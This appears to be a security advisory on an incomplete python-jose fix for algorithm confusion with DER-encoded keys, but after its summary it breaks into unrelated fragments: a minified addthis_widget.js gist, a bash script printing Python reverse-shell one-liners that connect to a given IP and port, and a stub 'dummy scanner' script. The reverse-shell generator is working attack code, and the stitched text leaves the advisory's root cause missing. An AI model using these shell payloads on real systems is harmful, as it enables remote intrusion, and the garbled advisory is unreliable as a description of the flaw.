
python-jose 3.5.0: Incomplete Fix for CVE-2024-33663 — DER-Encoded Keys Bypass Algorithm Confusion Guard

Summary

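The fix for CVE-2024-33663 in python-jose 3.5.0 added guards in HMACKey.__init__() that check is_pem_format(key) and is_ssh_key(key) to prevent asymmetric public keys from being used as HMAC secrets. However, DER-encoded (binary) public keys match neither check, so HMACKey still accepts them as HMAC secrets. This enables the same algorithm confusion attack that the CVE-2024-33663 fix was intended to prevent. The verifiers affected are those that hold the public key as DER bytes and do not restrict the accepted algorithms to the key's asymmetric family; pinning the accepted-algorithms list at verification time removes the confusion regardless of key encoding.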

Affected version: python-jose 3.5.0 (latest release)
CWE: CWE-327 (Use of a Broken or Risky Cryptographic Algorithm)

Root Cause

uug4na / addthis_widget.js
Created August 22, 2024 12:29
addthis_widget.js - backup
!function(e){function t(n){if(a[n])return a[n].exports;var o=a[n]={exports:{},id:n,loaded:!1};return e[n].call(o.exports,o,o.exports,t),o.loaded=!0,o.exports}var n=window.atwpjp;window.atwpjp=function(a,i){for(var r,s,c=0,l=[];c<a.length;c++)s=a[c],o[s]&&l.push.apply(l,o[s]),o[s]=0;for(r in i){var u=i[r];switch(typeof u){case"object":e[r]=function(t){var n=t.slice(1),a=t[0];return function(t,o,i){e[a].apply(this,[t,o,i].concat(n))}}(u);break;case"function":e[r]=u;break;default:e[r]=e[u]}}for(n&&n(a,i);l.length;)l.shift().call(null,t)};var a={},o={0:0};return t.e=function(e,n){if(0===o[e])return n.call(null,t);if(void 0!==o[e])o[e].push(n);else{o[e]=[n];var a=document.getElementsByTagName("head")[0],i=document.createElement("script");i.type="text/javascript",i.charset="utf-8",i.async=!0,i.src=t.p+""+({1:"custom-messages",227:"menu",229:"custom-messages-preview",231:"floating-css",233:"layers",234:"getcounts",235:"counter"}[e]||e)+"."+{1:"febb9e243de137d5e74d",2:"c8420cfcd8947e870ed4",3:"629362d1055012fa6109",4
#!/bin/bash
if [[ -z $3 ]];
then
echo "Usage: $0 <Language> <Ip> <Port>"
else
if [[ $1 == "Python" || $1 == "python" ]];
then
echo '"'">python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$2",$3));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'"'"'
echo '"'">python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("$2",$3));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'"'"'
fi
import sys
import argparse
import subprocess
import os
# Command-line interface: one optional string option, --domain.
parser = argparse.ArgumentParser(description='dummy scanner')
parser.add_argument(
    '--domain',
    dest='domain',
    default=None,
    type=str,
    help='Domain name',
)
# With no argument list given, parse_args() reads the process command line.
args = parser.parse_args()
# domain is None when --domain is omitted, so later code has to handle that case.
# NOTE(review): this file imports subprocess; if domain is later placed on a
# command line, validate it as a hostname and pass it as a list element rather
# than through a shell -- confirm against the rest of the script.
domain = args.domain